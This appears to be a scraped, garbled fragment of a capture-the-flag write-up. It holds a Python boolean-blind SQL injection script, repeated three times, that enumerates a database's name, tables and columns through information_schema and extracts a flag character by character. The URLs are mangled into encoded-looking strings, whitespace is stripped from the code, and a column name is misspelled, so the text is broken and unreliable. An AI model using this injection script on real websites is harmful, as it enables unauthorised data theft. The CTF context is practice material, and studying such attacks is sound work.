url ="ea5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select database()),%s,1))=%d"
url ="c0dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))=%d"
url ="466K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(coulmn_name) from information_schema.columns where table_name='answer'),%s,1))=%d"
url ="f61K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(flag) from answer),%s,1))=%d"
result =""
fori inrange(1,100):
forj inrange(33,127):
payload =url %(i,j)
resp =requests.get(payload)
if"查询"inresp.text:
result +=chr(j) # ascii码 转为 字符
print(result)
break
print(result)
importrequests
url ="ea5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select database()),%s,1))=%d"
url ="c0dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))=%d"
url ="466K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(coulmn_name) from information_schema.columns where table_name='answer'),%s,1))=%d"
url ="f61K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(flag) from answer),%s,1))=%d"
result =""
fori inrange(1,100):
forj inrange(33,127):
payload =url %(i,j)
resp =requests.get(payload)
if"查询"inresp.text:
result +=chr(j) # ascii码 转为 字符
print(result)
break
print(result)
判断注入位点、判断select列数、查库名、查表名、查列名
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
importrequests
url ="ea5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select database()),%s,1))=%d"
url ="c0dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))=%d"
url ="466K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(coulmn_name) from information_schema.columns where table_name='answer'),%s,1))=%d"
url ="f61K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7$3j5U0t1&6z5r3c8V1i4K6u0V1j5K6m8U0k6q4)9J5k6o6b7%4x3e0m8Q4x3X3c8T1j5$3u0S2i4K6u0V1k6e0t1I4x3K6V1I4k6o6g2V1y4U0c8X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3x3#2)9J5k6i4m8Z5M7q4)9K6c8X3W2V1i4K6y4p5x3l9`.`. or ascii(substr((select group_concat(flag) from answer),%s,1))=%d"